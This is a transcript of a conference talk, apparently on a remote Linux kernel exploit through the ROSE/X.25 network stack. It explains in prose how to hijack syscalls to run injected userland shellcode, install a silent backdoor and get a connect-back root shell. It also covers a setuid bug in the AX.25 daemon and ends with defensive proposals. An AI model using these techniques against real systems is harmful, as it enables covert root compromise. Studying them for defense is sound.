In addition to saving the userland stack pointer, the kernel saves the userland instruction pointer on the kernel stack so that when it returns from the system call it knows where to go. So we just need to overwrite this pointer on the stack with the address of the userland shellcode we just injected, and then when the process returns, it'll run our code in userland. Because we wanna do things perfectly and make sure nothing crashes, after we've done this we jump to the original handler for the system call that we hijacked. So if we hooked close, for example, we want the close to still actually happen. Now comes the part where you get to use your imagination: because we set things up this way, you can use whatever userland payload you want. A connect-back shell is good; you can use Metasploit payloads for all I care. One thing I did do is that regardless of what userland payload you provide, I prefix it with a stub that makes sure the process you hijacked keeps running. All this stub does is fork a new process, and then the child runs the shellcode that you injected. Wow, it's rowdy over there. The child runs the shellcode that you injected, and the parent of the fork jumps to where it was originally gonna go, so that if you're hijacking something important, it will keep doing whatever it was doing and be none the wiser. So now it's the real fun part, where I get to demo this and pray to the demo gods. I've got two VMs up and running. This is awful. Password is password, like all my machines. So we're gonna set up the ROSE server stack. This is just a little shell script to create the appropriate interfaces and bind them. Likewise on the client, we just bring up the ROSE protocol stack. I've aliased call to just make a ROSE call from this host, elite1, to the victim host, loser1, using the ROSE port associated with this host. Now, we've already loaded our kernel exploit into this attacker machine's kernel.
So whenever we make a call, it'll send our exploit over to the victim. We'll do that, and it's done. You don't have to clap yet, because I haven't really proven anything. But you'll notice that absolutely nothing was logged; that's all just residual output from bringing up the ROSE stack. You would have no idea that this happened to you, but that machine is now totally owned. So we'll demonstrate the backdoor that I just installed as part of running that exploit. I'm gonna bring up a server that I wrote. This is actually an X.25 connect-back shell, which was sort of a pain to write. So this is just a server listening for X.25 connections. And this is my little magic ping command that just builds our special ICMP packet. I'm gonna install this X.25 shellcode that I compiled, and I'm gonna trigger it by hooking syscall 6, which is close. It's just a good choice because it gets called frequently. And the IP address of the victim. So we'll send that packet over, wait a few seconds, and pray to the demo gods. And we have a root shell. Now of course, once you've compromised a host, you always need to check for the zero-day text file living in the home directory, because you've earned it. Well, that's really difficult to read. The point is, I also audited the userland utilities associated with this network stack, and the AX.25 daemon actually has a missing return code check on setuid. So if you're actually handing out unprivileged shells using AX.25, which I'm sure all of you do, you can make a connection, essentially fork bomb the machine, and then make another connection; the setuid call will fail, and it'll give you a root shell instead of an unprivileged shell. That's sort of a funny bug. All right, this exploit has a lot of things that could use improvement. First off, the thing that really bothers me is that I hardcoded a bunch of things.
There are some advantages to hardcoding, and this is sort of a toss-up between reliability and portability. If you're hardcoding something, you're reasonably sure it's going to work every time on the machine you targeted it for, versus a heuristic approach, where you're doing signatures or something that will work on a wider variety of hosts but may fail some of the time, even on hosts that you've tested. On a Physical Address Extension (PAE) kernel like the one I targeted, it seems mostly unavoidable that you have to use ROP. So the goals here are really just to minimize the number of ROP gadgets you use and minimize the amount of hardcoding of other data structures you have to do. If you're running a non-PAE kernel, the situation's much better. You can actually get by with a single known instruction, like a jmp esp instruction, for example, because you can jump right into the stack, since it's executable. And it may be possible to do something with partial overwrites, like overwriting a portion of the frame pointer or stack pointer, or doing some sort of spray approach where you don't even need to know any instructions. So the fact that it's PAE makes exploitation significantly more difficult. The next limitation, in my opinion: using this magic little write-protect bit is fun and easy, but technically speaking, it's not the safest thing in the world. It's a per-CPU bit, so if you have a multi-processor system, there's actually a small risk: you flip this bit so you can write to read-only memory, but what if that thread gets scheduled out and scheduled back in on the other processor before you make the write? Then it would try to write to read-only memory and crash. I have never seen or heard of that ever happening; it's a very, very small race window. But it's possible, and it might be worth considering alternative ways to write to read-only memory.
It might be possible to just leverage kernel functions that already exist that will do this in a safe way, and then the challenge becomes finding those at runtime. Now, some more general future work on the offensive side. Because these exploits really rely on knowing something about your target, I think remotely being able to fingerprint a kernel, identifying whether this is a distribution kernel, what distribution it is, and what version it's likely to be, is really essential to gaining the information you need about your target to build your exploit. I'd also like to look at other fun packet families for exploitation. IrDA, Bluetooth, and X.25 are all less tested and probably have plenty of fun bugs, and of course, finding that IP bug that breaks the entire internet is always future work. On the defense side, I think it's pretty clear that the weakest link of this exploit is that you need to know things about the kernel; you need to know those known instruction locations. So if we do something like randomizing the kernel base at boot, which is a Linux kernel patch series that I have tinkered with and started trying to get upstreamed, that totally prevents all this code reuse, and your exploit no longer works, in the absence of some way of remotely disclosing kernel memory, which is possible, but I've actually never heard of such a bug. Additionally, it's pretty clear that the more exotic networking protocols are not tested as rigorously and could probably use some work. Next, it would be really nice if certain functions like set_memory_x were inlined so that you can't leverage them in return-oriented programming, and it's not quite so easy to mark things executable. And finally, some longer-term work: it would be really good if there were policies implemented in the kernel that prevented changing page permissions after initialization. I think the PaX team is actually working on something like this.
So now we're on to questions. You guys have any questions? You're all just stunned. Yes? Sorry, what was that? Yeah, the bug was found through inspection. I actually had no real amateur radio experience prior to that; I am not a licensed operator. So it was found through auditing. If I hooked getuid in my exploit, that would probably cause an infinite loop, yeah. Because, yeah, exactly: your hook would get called, and then you would call getuid in your hook, and it would call your hook again. Don't use that one, I guess. Good point. I'm sorry, would you mind speaking up? If I understand, did you mean creating a USB device that sort of exploits itself? You need to get what on the system? Oh, to send, like, if you were doing this with real radio hardware? How about we talk afterwards? Any other questions? I saw one over there. Can you just disable interrupts? Oh, that would probably help, yeah. For the write-protect bit, you mean? Yeah, I think that would probably work. Good idea. John? No, no, I don't wanna marry you, John. All right, cool, thanks guys.